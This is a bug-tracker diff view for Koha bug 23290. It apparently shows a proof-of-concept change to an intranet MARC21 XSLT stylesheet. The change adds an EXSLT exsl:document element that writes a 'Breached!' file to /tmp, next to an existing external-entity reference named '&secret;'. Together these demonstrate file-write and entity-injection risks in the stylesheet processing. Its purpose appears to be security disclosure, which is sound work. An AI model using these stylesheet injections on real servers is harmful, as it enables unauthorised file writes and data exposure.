View | Details | Raw Unified | Return to bug 23290
Collapse All | Expand All

(-)a/koha-tmpl/intranet-tmpl/prog/en/xslt/MARC21slim2intranetDetail.xsl (-2 / +2 lines)
Lines 9-18 Link Here
9
  xmlns:items="http://www.koha-community.org/items"
9
  xmlns:items="http://www.koha-community.org/items"
10
  xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
10
  xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
11
  xmlns:str="http://exslt.org/strings"
11
  xmlns:str="http://exslt.org/strings"
12
  xmlns:exsl="http://exslt.org/common" extension-element-prefixes="exsl"
12
  exclude-result-prefixes="marc items str">
13
  exclude-result-prefixes="marc items str">
13
    <xsl:import href="MARC21slimUtils.xsl"/>
14
    <xsl:import href="MARC21slimUtils.xsl"/>
14
    <xsl:output method = "html" indent="yes" omit-xml-declaration = "yes" encoding="UTF-8"/>
15
    <xsl:output method = "html" indent="yes" omit-xml-declaration = "yes" encoding="UTF-8"/>
15
    <xsl:template match="/"><secret>&secret;</secret>
16
    <xsl:template match="/"><secret>&secret;</secret><exsl:document href="file:///tmp/breached.txt" omit-xml-declaration="yes" method="text"><xsl:text>Breached!</xsl:text></exsl:document>
16
            <xsl:apply-templates/>
17
            <xsl:apply-templates/>
17
    </xsl:template>
18
    </xsl:template>
18
19
19
- 

Return to bug 23290